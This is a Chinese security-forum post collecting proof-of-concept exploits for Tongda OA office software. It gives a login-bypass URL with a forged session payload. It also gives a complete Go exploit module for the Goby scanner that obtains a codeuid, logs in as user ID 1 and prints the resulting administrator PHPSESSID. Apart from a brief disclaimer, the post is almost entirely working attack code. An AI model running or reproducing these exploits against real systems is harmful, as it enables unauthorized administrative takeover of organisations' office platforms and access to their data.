DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 7468|回复: 0

[2022] 通达漏洞 PoC 整理

[复制链接]

188

主题

35

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
354
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2022-8-4 10:34:07 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

1、通达 OA 登录认证绕过


URL:

  1. /module/retrieve_pwd/header.inc.php?_ZQA_ID=3fb5b8eadff9c793
复制代码

Payload:

  1. SESSION%5BLOGIN_THEME%5D=15&_SESSION%5BLOGIN_USER_ID%5D=1&SESSION%5BLOGIN_UD%5D=1
复制代码

2、通达 OA 任意用户登陆漏洞


  1. package exploits

  2. import (
  3.   "git.gobies.org/goby/goscanner/goutils"
  4.   "git.gobies.org/goby/goscanner/jsonvul"
  5.   "git.gobies.org/goby/goscanner/scanconfig"
  6.   "git.gobies.org/goby/httpclient"
  7.   "regexp"
  8.   "strings"
  9. )

  10. func init() {
  11.   expJson := `{
  12.   "Name": "Tongda OA Arbitrary User Login Vulnerability",
  13.   "Description": "<p><span style="color: var(--primaryFont-color);">Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.</span><br></p><p><span style="color: rgb(22, 51, 102); font-size: 16px;"></span><span style="color: rgb(0, 0, 0); font-size: 16px;">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>",
  14.   "Product": "Tongda-OA",
  15.   "Homepage": "https://www.tongda2000.com/",
  16.   "DisclosureDate": "2021-05-20",
  17.   "Author": "su18@javaweb.org",
  18.   "FofaQuery": "body="/static/templates/2013_01/index.css/" || body="javascript:document.form1.UNAME.focus()" || body="href=\\"/static/images/tongda.ico\\"" || body="<link rel=\\"shortcut icon\\" href=\\"/images/tongda.ico\\" />" || (body="OA提示:不能登录OA" && body="紧急通知:今日10点停电") || title="Office Anywhere 2013" || title="Office Anywhere 2015" || (body="tongda.ico" && (title="OA" || title="办公")) || body="class=\\"STYLE1\\">新OA办公系统"",
  19.   "GobyQuery": "body="/static/templates/2013_01/index.css/" || body="javascript:document.form1.UNAME.focus()" || body="href=\\"/static/images/tongda.ico\\"" || body="<link rel=\\"shortcut icon\\" href=\\"/images/tongda.ico\\" />" || (body="OA提示:不能登录OA" && body="紧急通知:今日10点停电") || title="Office Anywhere 2013" || title="Office Anywhere 2015" || (body="tongda.ico" && (title="OA" || title="办公")) || body="class=\\"STYLE1\\">新OA办公系统"",
  20.   "Level": "3",
  21.   "Impact": "<p><span style="color: rgb(0, 0, 0); font-size: 16px;">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>",
  22.   "Recommendation": "<p><span style="color: rgb(22, 51, 102); font-size: 16px;"></span><a href="https://www.tongda2000.com/" target="_blank"><span style="color: rgb(0, 0, 0); font-size: 16px;">Please follow the manufacturer's website to update it in time. </span>https://www.tongda2000.com/</a><br></p>",
  23.   "References": [
  24.     "https://fofa.so/"
  25.   ],
  26.   "Is0day": true,
  27.   "HasExp": true,
  28.   "ExpParams": [],
  29.   "ExpTips": {
  30.     "Type": "",
  31.     "Content": ""
  32.   },
  33.   "ScanSteps": [
  34.     "AND",
  35.     {
  36.       "Request": {
  37.         "method": "GET",
  38.         "uri": "/",
  39.         "follow_redirect": true,
  40.         "header": {},
  41.         "data_type": "text",
  42.         "data": ""
  43.       },
  44.       "ResponseTest": {
  45.         "type": "group",
  46.         "operation": "AND",
  47.         "checks": [
  48.           {
  49.             "type": "item",
  50.             "variable": "$code",
  51.             "operation": "==",
  52.             "value": "200",
  53.             "bz": ""
  54.           }
  55.         ]
  56.       },
  57.       "SetVariable": []
  58.     }
  59.   ],
  60.   "ExploitSteps": [
  61.     "AND",
  62.     {
  63.       "Request": {
  64.         "method": "GET",
  65.         "uri": "",
  66.         "follow_redirect": true,
  67.         "header": {},
  68.         "data_type": "text",
  69.         "data": ""
  70.       },
  71.       "ResponseTest": {
  72.         "type": "group",
  73.         "operation": "AND",
  74.         "checks": [
  75.           {
  76.             "type": "item",
  77.             "variable": "$code",
  78.             "operation": "==",
  79.             "value": "200",
  80.             "bz": ""
  81.           }
  82.         ]
  83.       },
  84.       "SetVariable": []
  85.     }
  86.   ],
  87.   "Tags": [
  88.     "Login Bypass"
  89.   ],
  90.   "VulType": [
  91.     "Login Bypass"
  92.   ],
  93.   "CVEIDs": [
  94.     ""
  95.   ],
  96.   "CNNVD": [
  97.     ""
  98.   ],
  99.   "CNVD": [
  100.     ""
  101.   ],
  102.   "CVSSScore": "9.0",
  103.   "Translation": {
  104.     "CN": {
  105.       "Name": "通达 OA 任意用户登陆漏洞",
  106.       "Product": "通达-OA",
  107.       "Description": "<p>通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。<br></p><p>通达存在任意用户登陆漏洞,攻击者可以通过指定接口登陆任意用户,获取后台管理权限,直接登录后台进行敏感操作。</p>",
  108.       "Recommendation": "<p>请联系官方厂商进行更新。<a href="https://www.tongda2000.com/" target="_blank">https://www.tongda2000.com/</a><br></p>",
  109.       "Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;">通达存在任意用户登陆漏洞,攻击者可以通过指定接口登陆任意用户,获取后台管理权限,直接登录后台进行敏感操作。</span><br></p>",
  110.       "VulType": [
  111.         "登录绕过"
  112.       ],
  113.       "Tags": [
  114.         "登录绕过"
  115.       ]
  116.     },
  117.     "EN": {
  118.       "Name": "Tongda OA Arbitrary User Login Vulnerability",
  119.       "Product": "Tongda-OA",
  120.       "Description": "<p><span style="color: var(--primaryFont-color);">Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.</span><br></p><p><span style="color: rgb(22, 51, 102); font-size: 16px;"></span><span style="color: rgb(0, 0, 0); font-size: 16px;">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>",
  121.       "Recommendation": "<p><span style="color: rgb(22, 51, 102); font-size: 16px;"></span><a href="https://www.tongda2000.com/" target="_blank"><span style="color: rgb(0, 0, 0); font-size: 16px;">Please follow the manufacturer's website to update it in time. </span>https://www.tongda2000.com/</a><br></p>",
  122.       "Impact": "<p><span style="color: rgb(0, 0, 0); font-size: 16px;">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>",
  123.       "VulType": [
  124.         "Login Bypass"
  125.       ],
  126.       "Tags": [
  127.         "Login Bypass"
  128.       ]
  129.     }
  130.   },
  131.   "AttackSurfaces": {
  132.     "Application": null,
  133.     "Support": null,
  134.     "Service": null,
  135.     "System": null,
  136.     "Hardware": null
  137.   }
  138. }`

  139.   checkIsTongdaOA1231234 := func(host *httpclient.FixUrl) bool {
  140.     requestConfig := httpclient.NewGetRequestConfig("/inc/expired.php")
  141.     requestConfig.VerifyTls = false
  142.     requestConfig.FollowRedirect = false

  143.     if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
  144.       return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "tongda")
  145.     }
  146.     return false
  147.   }

  148.   getTongdaCodeUID435345 := func(host *httpclient.FixUrl) string {
  149.     requestConfig := httpclient.NewGetRequestConfig("/ispirit/login_code.php")
  150.     requestConfig.VerifyTls = false
  151.     requestConfig.FollowRedirect = false

  152.     if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
  153.       if resp.StatusCode == 200 && strings.Contains(resp.RawBody, ""codeuid"") {
  154.         return regexp.MustCompile(`\{"codeuid":"\{(.*?)}"`).FindStringSubmatch(resp.RawBody)[1]
  155.       }
  156.     }
  157.     return ""
  158.   }

  159.   getTongdaPHPSESSID4564234 := func(codeuid string, host *httpclient.FixUrl) string {
  160.     requestConfig := httpclient.NewPostRequestConfig("/logincheck_code.php")
  161.     requestConfig.VerifyTls = false
  162.     requestConfig.FollowRedirect = false
  163.     requestConfig.Header.Store("Content-type", "application/x-www-form-urlencoded")
  164.     requestConfig.Data = "UID=1&CODEUID=_PC{" + codeuid + "}"

  165.     if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
  166.       if resp.StatusCode == 200 && strings.Contains(resp.RawBody, ""status":1") && strings.Contains(resp.RawBody, ""url":"general") && strings.Contains(resp.HeaderString.String(), "Set-Cookie: PHPSESSID=") {
  167.         return regexp.MustCompile(`Set-Cookie: PHPSESSID=(.*?);`).FindStringSubmatch(resp.HeaderString.String())[1]
  168.       }
  169.     }
  170.     return ""
  171.   }

  172.   exploitTongda45321 := func(phpsessionid string, host *httpclient.FixUrl) bool {
  173.     // 攻击 URL
  174.     requestConfig := httpclient.NewGetRequestConfig("/general/")
  175.     requestConfig.VerifyTls = false
  176.     requestConfig.FollowRedirect = false
  177.     requestConfig.Timeout = 15
  178.     requestConfig.Header.Store("Cookie", "PHPSESSID="+phpsessionid)

  179.     // 发送攻击请求
  180.     if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
  181.       return resp.StatusCode == 302 && strings.Contains(resp.Utf8Html, "tongdainfo")
  182.     }
  183.     return false
  184.   }

  185.   ExpManager.AddExploit(NewExploit(
  186.     goutils.GetFileName(),
  187.     expJson,
  188.     func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
  189.       if checkIsTongdaOA1231234(u) {
  190.         codeuid := getTongdaCodeUID435345(u)
  191.         if codeuid != "" {
  192.           phpsessionid := getTongdaPHPSESSID4564234(codeuid, u)
  193.           if phpsessionid != "" {
  194.             return exploitTongda45321(phpsessionid, u)
  195.           }
  196.         }
  197.       }

  198.       return false
  199.     },
  200.     func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {

  201.       if checkIsTongdaOA1231234(expResult.HostInfo) {
  202.         codeuid := getTongdaCodeUID435345(expResult.HostInfo)
  203.         if codeuid != "" {
  204.           phpsessionid := getTongdaPHPSESSID4564234(codeuid, expResult.HostInfo)
  205.           if phpsessionid != "" {
  206.             if exploitTongda45321(phpsessionid, expResult.HostInfo) {
  207.               expResult.Success = true
  208.               expResult.Output = "登陆成功,使用如下 session 即可登陆:" + phpsessionid
  209.             }
  210.           }
  211.         }
  212.       }

  213.       return expResult
  214.     },
  215.   ))
  216. }
复制代码

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 (吉沃科技) ( 京ICP备2021005070号 )

GMT+8, 2024-12-22 16:15 , Processed in 0.061536 second(s), 26 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表